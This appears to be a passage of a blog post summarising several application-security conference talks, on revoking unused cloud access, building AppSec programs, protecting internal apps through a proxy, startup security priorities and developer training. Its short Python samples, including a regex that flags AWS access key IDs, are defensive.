Will and Travis would like to automatically remove users from AWS accounts they don’t use. This reduces the risk of user workstation compromise by limiting the attacker’s ability to pivot to other, more interesting resources: an attacker who compromises a dev laptop only gains access to the services that dev actively uses.

Offboarding is hard. Devs may stop working on a project, move between teams, or leave the company. Having an automated process that detects when someone hasn’t used a given account within a threshold amount of time and removes the access would significantly help keep things locked down over time.
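The threshold-based cleanup described above could be sketched like this. The data shape, the function name, and the 90-day default are assumptions for illustration; the talk summary does not say what threshold Netflix intends to use or where the last-used data comes from.

```python
from datetime import datetime, timedelta, timezone


def stale_access(last_used, now, max_idle=timedelta(days=90)):
    """Return (user, account) pairs whose access looks unused.

    `last_used` maps (user, account) to the datetime of the most recent
    activity, or None if no activity was ever recorded. The 90-day
    default is an arbitrary placeholder.
    """
    stale = []
    for (user, account), seen in last_used.items():
        if seen is None or now - seen > max_idle:
            stale.append((user, account))
    return sorted(stale)


now = datetime(2019, 6, 1, tzinfo=timezone.utc)
candidates = stale_access(
    {
        ("alice", "prod"): now - timedelta(days=5),
        ("alice", "legacy"): now - timedelta(days=200),
        ("bob", "test"): None,
    },
    now,
)
```

The output is a list of removal candidates rather than an automatic revocation, which leaves room for a notification or grace period before access is actually pulled.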

Whole > Sum of the Parts

All of these components are useful in isolation, but when you layer them together, you get something quite hard to overcome as an attacker, as there are many missteps that can get them detected: they need to know about the various signals Netflix is collecting, which services are locked down, etc. The goal is to frustrate attackers and cause them to go for easier targets.

Starting Strength for AppSec: What Mark Rippetoe can Teach You About Building AppSec Muscles

Fredrick “Flee” Lee, Head Of Information Security, Square
abstract slides video

In this talk, Flee gives some excellent, practical and actionable guidance on building an AppSec program, from the fundamentals (code reviews, secure code training, threat modeling), to prioritizing your efforts, the appropriate use of automation, and common pitfalls to avoid.

All while using weight lifting as an analogy.

Starting Strength: Book Cover
I never expected to be including a weight lifting book cover in my security talk summaries, but here we are

To be honest, I don’t normally like talks that are “security is like X,” but this talk was fun, engaging, and chock full of practical, useful advice. And now I have an 8 pack, thanks Flee! 💪

Key Takeaways

The core points from Flee’s talk:

Start small with your program
Start with things where you can start seeing some wins on day 10; don’t only invest in things where you’ll start getting value 2 years in. You can’t be Google and Netflix tomorrow.

Specificity + Frequent Practice == Success
In times of crisis, we fall back on what we’ve practiced the most. This is what’s going to make you successful.

Measure everything!
That’s how you convince yourself you’re making progress and get buy-in from management.

You are not Ronnie Coleman - don’t use his program (yet)
If you’re just starting out or have a small program, it might not make sense to adopt what the biggest/most complex teams are doing. Pick the right thing for your company at the right time.

Everyone can do this
Your company doesn’t need an AppSec team to have a decent AppSec program, these are all things devs can do themselves.

Overview

Good AppSec is a muscle, it has to be trained and continuously practiced or else it atrophies.

If you’re just starting out, Flee believes the 3 core fundamentals for AppSec are:

  • Code reviews (security deadlifts)
  • Secure code training (security squats)
  • Threat modeling (security bench press)

The Fundamentals

Code Review

All security critical code should receive a code review prior to deployment. For example, AuthN/AuthZ components, encryption usage, and user input/output.

The “Security-critical” caveat is there because most teams don’t have the resources to review everything. Focus on the most important parts.

Developer Training

All devs should have received language specific secure development training at least annually.

  • Don’t show kernel devs the OWASP Top 10 - they’ll be bored as it’s not relevant to them.
  • Rather than using generic examples, it’s much more interesting and engaging to show devs previous vulns from your company’s code bases. This makes it feel real and immediate.
  • Emphasize how to do the right thing, don’t just point out what the vulnerability is.

You know you’re doing training right when attendees like it!

See some of Coleen’s thoughts in the CISO Panel and Leif’s talk Working with Developers for some great details on how Segment makes security training for their devs fun and engaging.

Threat Modeling

All new significant features should receive a design review, led by developers with the security team assisting. AppSec should be there as a coach/assistant. This is a good way to get developer buy-in for security.

Document the results and plan mitigations for identified risks.

Getting Started - Beginner Gains!

Many teams start off trying to solve every vulnerability class. This is too much and can be overwhelming. Instead, pick a handful of key vulns to focus on. This focus can enable you to make a big impact in a relatively short amount of time.

Pick issues that are important to your business first. Are there any vuln classes that continue to pop up, from pen testing, bug bounty, and/or internal testing? If you’re not sure which vulns to focus on initially, that’s OK, you can pick a generic standard list, like the OWASP Top 10.

You’ll find that your weakest/most neglected areas improve quickly. Start small and learn!

Focus on Critical Areas

What’s most important to your business? Which teams historically have the most problems? Help them level up.

Aim your reviews at areas that return the biggest bang for the buck (e.g. high risk apps).

Get progress in a safe, refined way, for example, by defining processes or using checklists. Following the same established routine every time => get the same quality of results.

Understand the languages and frameworks your company uses. If you don’t know the stack your devs are using, you won’t be able to give them very good advice, and it damages their trust in you if you make generic or wrong recommendations.

Get help from devs - they can give you feedback on if you’re pushing security forward in a safe and sane way. Devs know the code the best, know what it’s supposed to do, etc.

Adding Automation and Tools

Adding automation helps you scale, but it’s not where you should start. Nail the fundamentals first: understand where you are and the problems you have and target them.

Static analysis can be a great tool, but it isn’t perfect and you shouldn’t start with it. Add it in after your company already has a good understanding of how to do code reviews. You should first have a good idea of the types of issues the tool should be looking for, otherwise you’ll end up wasting time.

Automation supplements humans. It doesn’t replace all manual effort: you still need a good code review program.

Don’t lose focus on risk reduction. This is ultimately what security is about.

Every Day is Leg Day

Some activities are so useful that they should occur in every project. For example, code reviews have a huge return on risk reduction vs effort. Flee’s never had an instance where a code review wasn’t useful. They’re not quick, but they’re valuable.

Make the activity mandatory, but reduce friction where possible to ensure the process is easy and palatable to dev teams. The security team doesn’t necessarily need to do it; these activities can be done by devs in many orgs. Have the security team engage devs: “Hey, here are some security things that you should be looking for.”

Measure and Record Your Progress

You can’t manage what you don’t measure
If you don’t measure your progress, you won’t know if you’re succeeding. What are the common vulns you’re seeing? By team / product? For example, if a team has been having trouble with SQL injection, give them focused training. Also, tune tools to target your most common vulns.

Record everything
If it’s easy to log, collect it. Track ALL defects found, and make them visible: to everyone, not just security team. Devs will change their behavior when that info is public. This doesn’t need to be done in a negative way, but rather helping people keep themselves accountable. If devs don’t see this info collected in one place, they might not know themselves.
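As a small illustration of tracking defects by team and vuln class, here is a sketch that tallies a list of defect records. The record fields (`team`, `vuln_class`) and the function name are hypothetical; in practice the data would come from wherever you track findings.

```python
from collections import Counter


def top_vulns_by_team(defects, n=3):
    """Count defects per team and return each team's n most common
    vulnerability classes as (vuln_class, count) pairs."""
    counts = {}
    for defect in defects:
        team_counts = counts.setdefault(defect["team"], Counter())
        team_counts[defect["vuln_class"]] += 1
    return {team: c.most_common(n) for team, c in counts.items()}


defects = [
    {"team": "payments", "vuln_class": "sqli"},
    {"team": "payments", "vuln_class": "sqli"},
    {"team": "payments", "vuln_class": "xss"},
    {"team": "search", "vuln_class": "ssrf"},
]
summary = top_vulns_by_team(defects)
```

A summary like this is enough to answer "which team needs focused SQL injection training?" and to decide which vuln classes to tune tools for first.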

Adopt Standards and Expert Help

Leverage what you’ve learned to start enforcing coding guidelines. As you progress, you can become stricter on what counts as a code review “violation.”

Over time, try to move the AppSec team towards being “coaches” of reviews rather than “reviewers.” The AppSec team should be personal trainers for the developers performing the reviews. Security Champions can scale AppSec efforts really well.

Refining for Specific Goals

Once you’ve mastered some fundamentals, you can tweak your review process to target specific weaknesses:

  • Tune your code reviews/static analysis to find issues specific to your org (even non-security issues).
  • Reinforce good practices with automation, not just pointing out problems.
  • Build/use secure frameworks and services.

Pro-tip: A powerful way to get dev buy-in for static analysis is to show them how to find a non-security coding bad practice they care about. For example, foo() needs to never have a hard-coded string passed in its second argument.

If you find this idea interesting, feel free to check out my ShellCon 2019 talk about finding code patterns with lightweight static analysis.
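To show how lightweight such a check can be, here is a minimal sketch for the foo() example using Python's standard `ast` module. It assumes the code being scanned is Python (3.8+) and only looks at positional arguments; the function name `find_hardcoded_second_arg` is made up for this example and is not from the talk.

```python
import ast


def find_hardcoded_second_arg(source, func_name="foo"):
    """Return (line, value) for every call to `func_name` whose second
    positional argument is a string literal.

    Matches both plain calls (foo(...)) and attribute calls (obj.foo(...)).
    Keyword arguments are not inspected in this sketch.
    """
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        callee = node.func
        if isinstance(callee, ast.Name):
            name = callee.id
        else:
            name = getattr(callee, "attr", None)
        if name != func_name or len(node.args) < 2:
            continue
        second = node.args[1]
        if isinstance(second, ast.Constant) and isinstance(second.value, str):
            findings.append((node.lineno, second.value))
    return sorted(findings)


code = 'foo(x, "secret")\nfoo(x, y)\nobj.foo(1, "k")\nbar(1, "z")\n'
hits = find_hardcoded_second_arg(code)
```

On the sample above, only the calls on lines 1 and 3 are reported. The same shape of check works for many "never call X like this" rules that devs already care about.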

Pitfall: Taking on Too Much

Don’t expect to cover every project immediately, especially if you’re just starting with a small team.

Don’t get hung up on low-risk apps and vulns and not give time to other code bases or other classes of issues that are more impactful. Some vulns matter more than others.

Give your program time to grow. You’re not going to have FAANG-level security in a year, especially if you have a small team. Overpromising what you’ll be able to accomplish in a short amount of time to other people in your org can damage your reputation and their trust in you.

Pitfall: Bad Form

No developer buy-in
Devs are incentivized to ship features. You have to be mindful of their perspective and mindset. Ideally members of the security team have some dev background, as it’s incredibly useful to be able to speak engineering’s language and communicate how they think.

Generic secure development training
Flee finds most security training is bad - it’s generic and not customized to the types of technologies one’s company uses or the situations their devs typically face. This makes it much harder to get dev buy-in and interest, as the training is taking some of their time.

Using Untuned Tools
Flee has never found a security tool that you buy, run without tuning, and the output is useful. Tools always require customization.

Pitfall: Trying to Use (the wrong) Shortcuts

There are no silver bullets to create a strong AppSec program, it takes time and effort.

Skipping documentation/metrics
You can’t just find bugs and put them in Jira. You need to document what you found and your results along the way so you can look back later and hold yourself and others accountable.

Don’t over-rely on tools
Despite what’s shouted from the RSA and BlackHat vendor halls, tools won’t solve all your problems.

Avoid FUD when trying to influence devs
Using FUD to try to motivate devs undermines your credibility and makes them less likely to listen to you in the future. You need their buy-in: that’s your best ally in getting security to run and work well.

What about insert your fav activity?!?!

This talk discussed code reviews, secure code training, and threat modeling because they’re the fundamentals.

There are other things that are useful, but they don’t have to be there on day 1 (e.g. pen testing, (ng)WAFs, RASP, etc.). They have their uses, but aren’t critical to AppSec.

Starting Strength: Mark Rippetoe Quote
Word on the street* is Flee used to write that on every performance review he gave his team. * I may or may not have just made that up.

Questions

How do you do targeted, tailored training in an org when you have many languages and frameworks?

This is hard. Partner with devs and security champions and have them help you create the training.

Rugged Software also has some useful ideas on integrating security into agile dev environments.

The Call is Coming From Inside the House: Lessons in Securing Internal Apps

Hongyi Hu, Product Security Lead, Dropbox
abstract slides video

A masterclass in the thought process behind and technical details of building scalable defenses; in this case, a proxy to protect heterogeneous internal web applications.

Why care about securing internal apps?

In short: they often have access to sensitive data, and it’s technically challenging.

Compared to production, customer-facing applications, internal apps often get neglected by security teams. However, these internal apps often expose sensitive data or functionality, like a debug panel for production systems or a business analytics app with sensitive company data.

Unfortunately we can’t just firewall off these internal apps, as they could get accidentally exposed by a network configuration, they can be targeted by an external attacker via CSRF or SSRF, or there may already be an attacker in your environment (hacker or insider threat).

Internal app security is interesting and challenging due to the scale and heterogeneity.

Securing Internal Apps - Motivation
Scale: Most companies have a handful of primary production apps but hundreds of internal apps.
Heterogeneity: The production apps likely use a well-defined set of core tech stacks for which the security team has built secure by default frameworks and other defenses. This is not scalable to dozens of other languages and frameworks. Further, internal apps may be built by people who don’t spend much of their time coding.

When embarking on this work, the Dropbox security team had the following goals:

  • The defenses should be scalable and agnostic to the backend’s tech stack.
  • Scalable development and adoption process - development teams’ adoption needs to be as frictionless and self-service as possible.

I want to emphasize how smart these goals are: any backend-agnostic defense would be a great win, and building a great technical solution isn’t enough, you need adoption. And if the security team needs to be involved when the defense is applied by every dev team or project, that’s going to eat up your time for the next… forever.

The Approach

Assuming we’re starting with a blank slate (no defenses), how do we scale up security basics to hundreds of web apps quickly?

tl;dr: Add network isolation and enforce that all internal apps must be accessed through a proxy, which becomes a centralized, scalable place to build defenses into.

Securing Internal Apps - Proxy Architecture

This approach allows them to:

  • Add authentication that they log and review and enforce strong 2FA (SSO + U2F)
  • Access control - check permissions for all requests, using ideas like entry point regulation
  • Enforce that users are using modern, up-to-date browsers (not vulnerable to known exploits, strong security posture)
  • Add monitoring, logging, etc.

Other Applications: Later in the talk, Hongyi goes into detail of how they used this proxy approach to add CSRF protections (add SameSite cookie flags) and XSS protections (Content-Security-Policy headers + nonces). He also makes the argument that using WAFs on internal networks can be effective, as internal networks shouldn’t have the level of malicious noise that your external websites will.
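As a rough sketch of what adding these protections at the proxy could look like, the function below rewrites backend response headers. The `SameSite` cookie attribute and CSP nonces are standard browser features; the function name, the choice of `SameSite=Lax`, and the specific CSP directives are assumptions for illustration and are not Dropbox's implementation.

```python
import secrets


def harden_response_headers(headers):
    """Return (hardened_headers, nonce) for a backend response.

    `headers` is a list of (name, value) tuples. Cookies without a
    SameSite attribute get SameSite=Lax appended, and a nonce-based
    Content-Security-Policy header is added.
    """
    nonce = secrets.token_urlsafe(16)  # fresh per response
    hardened = []
    for name, value in headers:
        if name.lower() == "set-cookie" and "samesite=" not in value.lower():
            value = value + "; SameSite=Lax"
        hardened.append((name, value))
    csp = f"script-src 'nonce-{nonce}'; object-src 'none'; base-uri 'none'"
    hardened.append(("Content-Security-Policy", csp))
    return hardened, nonce
```

For the nonce to be useful, the same value also has to be placed on the legitimate script tags in the HTML body, which this sketch does not do. That body rewriting (or cooperation from the backend) is where much of the real work would be.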

They have a number of ideas for other applications of the proxy that they haven’t yet done, including CORS allowlists, preventing clickjacking, invariant enforcement, sec-metadata, channel-bound cookies, canaries, and more.

Reflections on the Approach

Benefits:

  • Gives you a centralized, scalable place to build defenses into.
  • App owners don’t have to build these defenses themselves.
  • It’s easy to deploy patches and changes - you only have to deploy fixes to one place, and it’s a service the security team has control over.
  • Provides a number of benefits to other security partners: InfraSec, Detection and Response, etc.

Tradeoffs / Considerations:

  • A team needs to maintain the proxy and be oncall when issues arise.
    • This should be a team with experience maintaining high uptime systems. Consider partnering with your InfraSec team or an infrastructure team.
  • Reliability (and performance issues, to a lesser extent) are critical.
    • Ideally, if the proxy goes down you fail closed (safe), but if there are critical systems behind the proxy, you’ll be blocking people from doing their job.
    • e.g. If you have a monitoring system behind your proxy, if the proxy goes down, you won’t be able to troubleshoot.

Lessons Learned

Make developer testing and deployment easy; otherwise, this makes more work for the security team as you need to be heavily involved in adoption. The less friction there is, the more likely developers will want to use it.

Similarly, reduce mental burden on developers as much as possible, using blessed frameworks with defenses built-in and autogenerating security policies.

Make deployment and rollback safe and fast. You’re going to spend a lot of time troubleshooting policy mistakes, so make it quick and easy to reverse those mistakes. Make testing and debugging trivial.

Prioritize for your highest risks when rolling out the proxy; there will always be too much to do, so you have to brutally prioritize. For example, CSP might be too much work in your organization and other mitigations may be enough: the migration work might not be worth the risk reduction provided.

Which apps will reduce the most risk to protect?

Expect challenges; find trusted partners to try out ideas. In every company, there are people and teams that are more excited about security and willing to be early adopters of new security tools, services, and processes, even if they are currently half-baked, buggy, and high friction to use.

Start with them and iterate based on their feedback. This reduces the cost of failure, as you won’t be burning bridges when your solution isn’t perfect (which may cost you political capital if you bring it to less willing engineering teams before it’s ready). These early adopter teams can give you quick feedback, which allows you to increase your iteration speed.

On iteratively creating policies
Much of the work the Dropbox team ended up doing was refining policies. They could’ve saved a lot of time by initially adding the ability to enforce a relaxed policy while testing a tighter policy.
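For CSP specifically, browsers support this pattern directly: a response can carry an enforced `Content-Security-Policy` header alongside a `Content-Security-Policy-Report-Only` header whose violations are reported but not blocked. Here is a minimal sketch; the function name, the example policies, and the `/csp-reports` endpoint are hypothetical, and the summary doesn't say whether Dropbox used this exact mechanism.

```python
def csp_rollout_headers(enforced, candidate, report_uri):
    """Return headers that enforce a relaxed policy while trialing a
    tighter one in report-only mode.

    Violations of `candidate` are sent to `report_uri` but nothing is
    blocked, so the tighter policy can be refined safely.
    """
    return {
        "Content-Security-Policy": enforced,
        "Content-Security-Policy-Report-Only": f"{candidate}; report-uri {report_uri}",
    }


headers = csp_rollout_headers(
    enforced="script-src 'self' 'unsafe-inline'",
    candidate="script-src 'self'",
    report_uri="/csp-reports",  # hypothetical collection endpoint
)
```

Once reports for the candidate policy go quiet, it can be promoted to the enforced slot and the next tightening step can take its place.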

NIST CyberSecurity Framework

For tying all of these ideas together into a coherent strategy, Hongyi recommends the NIST CyberSecurity Framework.

Securing Internal Apps - NIST Cyber Security Framework
The NIST framework identifies 5 main security functions (the column headings: Identify, Protect, Detect, Respond, and Recover). Fill out this table and for each category, think about:
  • Who are the teams you need to involve?
  • What is the tech you have to build?
  • What are the processes to create?

This process helps you figure out where your company’s gaps are and where to invest going forward. This becomes your roadmap, which is also a great way to communicate your strategy to senior management.

Hongyi has borrowed some ideas from Adam Shostack: he treats these efforts like a security investment portfolio. Where are you investing now, and where do you want to change those investments? This is a simple tool but very flexible; you can adapt it as needed.

Final Thoughts

When you’re determining your AppSec team’s priorities, aim to scale your defenses and your processes.

Internal security engineering can be a great place to experiment with new features and to train up new security engineers. For example, if you’re not sure about CSP or SameSite cookies, you can deploy them internally first and learn from the experience. It’s also a good way to get experience building safe frameworks, as the reliability requirements are much lower than in externally facing production contexts.

Startup Security: Starting a Security Program at a Startup

Evan Johnson, Senior Security Engineer, Cloudflare
summary abstract slides video

In this talk, Evan describes what it’s like being the first security hire at a startup, how to be successful (relationships, security culture, compromise and continuous improvement), what should inform your priorities, where to focus to make an immediate impact, and time sinks to avoid.

This talk won’t help you build Google Project Zero in the next year, but it will give you a set of guiding principles you can reference.

If you’re lucky enough to be the first person working on security at a company then you have a great privilege and great responsibility. Successful or not, it’s up to you.

You will set the security tone of the company, and interactions with you will shape how your colleagues view the security team, potentially for years to come.

Evan’s Background

Evan has only worked at startups - first at LastPass, then as the first security engineer at Segment, then he was the first security engineer at Cloudflare, which he joined in 2015.

Security at a SaaS business

Evan breaks down “doing security” in a SaaS business as “protecting, monitoring, responding, and governing” the following categories: production, corporate, business operations, and the unexpected.

It’s also critical for the security team to communicate what they’re doing to their colleagues, other departments, the board, and the company’s leadership. Security progress can be hard to measure internally, but it’s an important aspect of your job, as is being accurate and setting the right expectations externally.

Security at Startups

Joining a startup is a great way early in your career to get more responsibility than anybody should probably give you.

If you want to be successful at a startup, there are 3 core aspects:

  1. Relationships
  2. Security Culture
  3. Compromise and Continuous Improvement

1. Relationships

When you are building a security program from scratch
Your coworkers are your customers! Building strong relationships with your engineers is the key to success. Without this, you’ll have a hard time getting engineers to work with you.

Building strong relationships with everyone else in the company is important as well. Try baking security in to the on-boarding and off-boarding flow, as it’s a great place to add security controls and meet your colleagues.

Your relationships are defined in times of crisis.

When issues arise, assure people it’s okay, you’ll fix things together. As much as possible, be level-headed, calm, and methodical in times of crisis.

2. Security Culture

Think about the type of security culture you want to build within your company. If you pull pranks on unlocked laptops, does that foster the type of trust between your team and the rest of the company that you want?

3 tips to building security culture:

  • Smile, even if you’re an introvert.
  • Be someone people like to be around.
  • You should be making technical changes (i.e. have an engineering-first culture on security teams).
    • Building things earns trust with engineers who are building your product, as it shows you can contribute too.

3. Compromise and Continuous Improvement

Meet people where they are and try to continuously work with them to make them more secure. It’s no one’s fault that they have bad practices or are insecure, but it’s your responsibility to do something about it.

Realize that it can sometimes take years to get the kind of traction you want to fix underlying issues. That’s OK.

Your First Day

You enter the startup’s office. There are huge windows with natural light and edgy but not too edgy art on the walls. Exposed brick and pipes are plentiful, it’s a bit hard to think over the cacophony of the open office floor plan, and there’s more avocado toast than you can shake a term sheet at.

Startup Security: Office
If you don’t fulfill the above description, r u even a startup, bro?

The co-founder sits you down and asks:

So, what challenge are you going to tackle first?

How Security Starts

It’s not uncommon for companies to have an incident or two and/or get to a certain size where they realize they need someone to work on security full time. You might want to ask during the interview, or at least when you show up on the first day, what prompted investing in security now?

Remember:

  • You were hired because you are the expert: people will listen to you.
  • You can do whatever you would like: whether it’s good for security or not.
  • You’ll have little internal guidance.

What Should Inform Your Priorities

All of the following influence what you prioritize first:

B2B vs B2C
This is the biggest thing that will inform your priorities. Who are your customers and what do they want from your company / the security team?

If you’re a B2B SaaS business, you’ll need compliance certifications in order for your sales team to continue selling the product to bigger and bigger customers.

Company Size
If you’re the first security person joining a 500 person team vs a 100 person team, you’ll likely prioritize different things. If the team is already large, you may want to focus on hiring other members on your team to scale your efforts.

Customer Base
Who your customers are within B2B or B2C also influences things, for example, selling HR software to banks vs. marketing software for solo consultants.

Product
There are different expectations of the security bar of your company based on what your product is.

Engineering Velocity
If your company has a move fast and break things mentality then the security team needs a different approach than if the culture is a low and slow type of company.

Company culture
Some cultures are really open to security people joining, others don’t understand why security is important. Every company is different.

In summary, companies care more or less about different things and will have different areas of risk.

Startup Security Playbook

Evan breaks where you should focus your efforts into 4 core areas:

Startup Security: Playbook

The common denominator of all of these is that they’re short in scope. You can get 95% of the way to at least initially addressing all of these in a quarter.

Security Engineering

This includes product / application security, infrastructure security, and cloud security.

SDLC and Security Design Reviews with engineers
Starting to work with engineers and embedding yourself in how they work pays major dividends later. If there isn’t a current SDLC structure, you can do inbound only. Offer to do code review and threat modeling, show value, and word will spread. Your ad-hoc process won’t have full coverage, but it’s a good start.

Understanding your tech stack by engineering

If you want to make a difference at a startup with the way people are building software, you need to build software.

If you want to learn about how your tech stack works at a deep level, you need to build software.

A great way to build relationships with engineers is to work with them and have them see you build things as well.

How you manage secrets, keys, and customer secrets
Take inventory of all of your really critical assets.

  • Secrets - Do you have a management system for secrets? Are people happy with it? Do you need to roll out Vault or some other secrets management system?
  • API Keys - How are they used in prod? How are they shared between developers? What API keys do devs have access to? Do you have engineers with prod cloud platform API keys on their laptops?

You can have a big impact in a short amount of time here.
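
As one way to start answering the "prod keys on laptops" question, here is a minimal sketch that searches text (for example, the contents of a dotfile or a repo) for strings shaped like AWS access key IDs. It is not something from the talk. The function name `find_access_key_ids` and the sample text are made up for illustration, and the pattern only matches the common `AKIA` (long-term) and `ASIA` (temporary) key ID prefixes, so treat a match as a lead to investigate rather than proof of a live credential.

```python
import re

# AWS access key IDs are 20 characters: a 4-letter prefix such as AKIA
# (long-term) or ASIA (temporary) followed by 16 uppercase letters/digits.
ACCESS_KEY_ID = re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b")


def find_access_key_ids(text):
    """Return the distinct AWS-style access key IDs found in text, in order."""
    seen = []
    for match in ACCESS_KEY_ID.finditer(text):
        if match.group(0) not in seen:
            seen.append(match.group(0))
    return seen


# Sample input uses the placeholder credentials from AWS documentation.
sample = """
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
"""
print(find_access_key_ids(sample))
```

In practice you would likely reach for an existing secret scanner instead, but even a quick pass like this can show whether the problem exists at all.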

Bug Bounty
Don’t rush into having a bug bounty; wait until you have the bandwidth to quickly and efficiently address submissions and resolve reported issues.

You need to make sure that you have a goal of what types of issues you want out of your bug bounty, and that your bug bounty is set up to get that output. Otherwise, you will just waste cycles.

Detection & Response / Incident Response

Detection and Response is one of the hardest areas to get traction. It’s also something that spans a ton of different domains: production, corporate, incidents, applications, infrastructures, SaaS…

Basic Incident Response Plan
Have a plan, get people to understand that plan, and make sure you are looped in when things go awry.

Set up a communication channel - people will start reporting things immediately, especially if you don’t already have some logging and monitoring set up. Create a way for people to tell you when things are on fire.

What are your top security signals for the organization?
What really matters for security, and how do you get insight into them?

Consider starting with monitoring AWS key usage, access to applications in your identity provider, and DNS at corporate offices.

Establish a communication channel with rest of company
How do people talk with you? How do people get ahold of you when they need you? This can be as simple as an email alias.

Logging Strategy
Where are you going to store logs over the long term?

Compliance

Public facing security docs are great
Something you can put on your website with technical details about the security things you’ve done that people can reference. Have a security page and a security@ alias for people to report bugs.

Knowledge Base
The best use of your time is not completing questionnaires for sales teams. Find a way to make it self-service.

Understand existing commitments
Before security people join a startup, it’s common for the business to commit to future compliance standards that it might not be ready for, often without any idea how hard meeting them will be. Sometimes that’s why you were hired in the first place.

Ask management what compliance commitments your company has made.

GDPR and current laws
Make sure you comply with all of the relevant laws.

Corporate Security

Identity and Access Management
You need a way to manage your applications and access to them. Corp and prod are both important, but corp may be easier to address first.

Endpoint Security
Table stakes for the long term. It’s better to get this done sooner rather than later, because it’s easier the smaller your company is.

On-boarding and Off-boarding
You can bake a lot of security (and hopefully usability) into these. They’re also tightly coupled with Identity and Access Management: do you remove people from prod when they no longer need access?

Workplace security
How do you protect people in your space? How do people badge in? Do they have to wear badges? Do you have doors propped open? Many startups start in small lofts and when they get a bigger space, they’re not used to handling these types of issues. Have procedures and policies for how visitors come and go.

Personal Stories

segmentio/aws-okta - success

At Segment, they deleted every engineer’s AWS key that they used on a day-to-day basis and gave them an equivalent role that they could access through Okta. This aws-okta tool is a drop-in replacement for aws-vault, which engineers were previously using.

Why was this such a success:

  • It raised Segment’s security posture massively.
  • The dev UX was really fast and smooth.
  • It was a massive change, yet engineering reached 100% adoption within 2-3 weeks of the security team working on it.

segmentio/chamber - failure

As the security team, it’s easy to say that you’ll handle all of the secrets for devs. But, Evan quickly found that people assumed he’d also handle rotation, ownership, managing the secrets, etc.

This project dragged on until he cut the scope and reset the expectations of engineering.

Key Takeaways

The two most important takeaways are:

  • Focus on things you can complete.
  • Focus on the biggest problems.

Otherwise you’ll never finish anything. Knock out the big things that you can finish.

Avoid taking on things that require lots of upkeep when you are a small team

  • Bug bounty takes a lot of upkeep. Buy the triaging from the program you’re using.
  • Avoid overcommitting to design reviews, arch reviews, etc. If you spend all your time doing those you will never be able to focus on making security better over the long run.

How are you more secure this month compared to last month?
Everyone should be asking this every month. What is built now that wasn’t there a month ago?

Startups are not for everyone
If you don’t have executive support, you should find a new company.

Security company? You better dogfood
If it’s good enough for your customers, it should be good enough for you.

Remember to keep it simple. Don’t focus on fancy solutions. Focus on the basics.

Focus on things that actually have a meaningful and measurable impact, instead of just fun projects you want to work on.

Questions

Do you have any strategies for helping future-proof your company’s security as it grows rapidly?

This is really hard and there’s no magic solution. Being able to brutally prioritize is key: determining which fires you can let continue to burn while you work on more pressing matters.

When you come into a company that already has all of this infrastructure in production and assets, how do you take inventory of what you already have (code) as well as your Internet-facing attack surface?

Evan’s generally accomplished this by working really closely with people who know these things; there are always a few people who know where all the bodies are buried, and they’ll tell you. They’ll be able to tell you valuable things like, “I did X for this security reason,” which will help you figure out where things are at and pick it up from there.

It’s essential to build trust with these people so you can keep asking them these questions. Learn who to ask.

Working with Developers for Fun and Progress

Leif Dreizler, Senior AppSec Engineer, Segment
abstract slides video

Influential Resources

Leif listed several talks that were influential to him and Segment in building a security program:

Leif also recommends the book Agile Application Security: Enabling Security in a Continuous Delivery Pipeline by Laura Bell et al.

Favorite Quotes

“Effective Security teams should measure themselves by what they enable, not by what they block” - Rich Smith

Enable, Don’t Block: Ideally the security team should say no as infrequently as possible. When you have to, say “No, but…” and help your colleagues find a way to accomplish their jobs.

“Vulnerabilities are bugs. The more bugs in your code, the more vulnerabilities”

Security Has to Start with Quality: Devs fix bugs all the time. Vulnerabilities are just bugs that have a security impact. They should be prioritized and fixed like the rest.

“Learn to lean on your tools. But depend on your people to keep you out of trouble.”

Choose People over Tools: People making good decisions earlier in the process are going to provide more value. You won’t have to find certain classes of vulnerabilities if you make good framework decisions.

“Make it easy for engineers to write secure code and you’ll get secure code.”

Check out Morgan Roman’s DevSecCon Seattle 2019 talk Ban Footguns: How to standardize how devs use dangerous aspects of your framework for one of my favorite talks in this area.

Organizational Buy In

You need the whole company to care about security - you can’t just buy a security team and security products. It helps to have a passionate security executive who can translate what the security team is working on to executives.

Security headcount, including people with a range of skillsets, as well as engineering time to fix bugs as well as build scalable systems, are also important.

Jonathan Marcil’s Threat Modeling Toolkit informs how they do threat modeling.

If you don’t have security buy-in from the top down I would probably look for another job because it’s definitely an employee’s market right now.

Building a Team

They’ve had success building security teams by hosting security meet-ups, speaking and attending conferences, sponsoring meet-ups, volunteering for OWASP, etc.

Getting involved in OSS software is also great.

Check out David Scrobonia’s talk (Leif’s colleague): Usable Security Tooling, in which he describes the heads-up display he built for ZAP.

Segment’s Head of Security, Coleen Coolidge, also gave a related talk: How to Build a Security Team and Program.

Training

All devs who join Segment go through two security trainings.

Part 1: Think Like an Attacker - Creating Relevant Content

Segment’s security training is interesting for developers because the security team makes it as relevant as possible.

The bug examples devs see in the training are sourced from real Segment bugs, found via bug bounty submissions, pen tests, or internal testing. This makes the vulnerabilities seem real, rather than abstract generic examples.

They also introduce Bugcrowd’s Vulnerability Rating Taxonomy (VRT) to show devs how the security team thinks about the relative severity and priority of vulnerabilities. This gives devs an anchoring in the future for how quickly they need to fix certain bug classes.

OWASP Juice Shop is used as the vulnerable app as it uses a similar tech stack to what Segment has internally.

Hands-On Training Schedule

The security team talks about a few vulnerability classes (slides + examples), then everyone does some interactive training (Burp Suite + Juice Shop). Repeat for other bug classes.

As the training is progressing, the names of devs are being written on a whiteboard as they successfully find and exploit bugs. It’s a leaderboard in which they’re competing against their fellow incoming dev cohort. This really helps with engagement, both by making it fun as well as making people not want to be the only people not on the board.

Working with Devs: 1337erboard
The Segment security team manages a 1337erboard that tracks people’s security ‘score’. Points are given for attending and participating in security training, finding bugs, fixing bugs, posting an interesting article in the #security Slack channel, etc.

By both presenting information as well as having devs actively engage with hands-on exercises, devs are more likely to absorb and retain the info.

I hear and I forget. I see and I remember. I do and I understand -Confucius

Part 2: Secure Code Review

Segment bases their secure code review training on the OWASP Secure Coding Cheat Sheet, tailored to Segment’s environment.

The main topics they cover include: XSS, broken access control, secrets management, error handling, SSRF + DNS rebinding, and more.

Leif and his colleague David discussed SSRF and DNS rebinding on the Absolute AppSec podcast #42, including a useful open source security tool Segment released: netsec, a proxy to block SSRF attacks targeting internal IPs.
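
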